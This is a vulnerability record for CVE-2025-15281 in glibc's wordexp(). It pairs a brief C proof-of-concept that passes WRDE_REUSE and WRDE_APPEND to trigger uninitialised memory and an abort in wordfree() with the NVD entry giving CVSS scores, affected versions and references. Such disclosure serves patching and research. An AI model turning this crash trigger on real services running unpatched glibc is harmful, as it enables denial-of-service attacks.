CVE-2025-15281

#include <stdio.h> #include <stdlib.h> #include <wordexp.h> /* * PoC for CVE-2025-15281 * GNU C Library wordexp() WRDE_REUSE + WRDE_APPEND memory corruption * * This PoC demonstrates that calling wordexp with both WRDE_REUSE * and WRDE_APPEND flags can cause uninitialized memory to be returned * in we_wordv, leading to process abort when wordfree() is called. */ int main(void) { wordexp_t p = {0}; int ret; printf("CVE-2025-15281 PoC - wordexp WRDE_REUSE + WRDE_APPEND bug\n"); printf("Testing on glibc < 2.43...\n\n"); // First call - initialize the structure ret = wordexp("$HOME/test", &p, 0); if (ret != 0) { printf("First wordexp call failed\n"); return 1; } printf("First call succeeded, we_wordc = %zu\n", p.we_wordc); // Second call with WRDE_REUSE | WRDE_APPEND - triggers the bug // This combination causes uninitialized memory to be returned ret = wordexp("$(echo test)", &p, WRDE_REUSE | WRDE_APPEND); if (ret != 0) { printf("Second wordexp call returned error code %d\n", ret); } else { printf("Second call succeeded, we_wordc = %zu\n", p.we_wordc); printf("WARNING: Potential uninitialized memory access in we_wordv\n"); } // This wordfree() call may cause abort due to corrupted pointers printf("Calling wordfree() - may trigger abort...\n"); wordfree(&p); printf("Test completed without abort (may be patched version)\n"); return 0; }

{"cve": {"id": "CVE-2025-15281", "sourceIdentifier": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "published": "2026-01-20T14:16:07.843", "lastModified": "2026-02-05T17:43:18.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Calling wordexp with WRDE_REUSE in conjunction with WRDE_APPEND in the GNU C Library version 2.0 to version 2.42 may cause the interface to return uninitialized memory in the we_wordv member, which on subsequent calls to wordfree may abort the process."}, {"lang": "es", "value": "Llamar a wordexp con WRDE_REUSE junto con WRDE_APPEND en la librería C de GNU versión 2.0 a la versión 2.42 puede causar que la interfaz devuelva memoria no inicializada en el miembro we_wordv, lo que en llamadas posteriores a wordfree puede abortar el proceso."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndExcluding": "2.43", "matchCriteriaId": "7F33B595-8215-4750-A4EF-2000F2C70F48"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33814", "source": "3ff69d7a-14f2-4f67-a097-88dee7810d18", "tags": ["Issue Tracking", "Patch"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/20/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}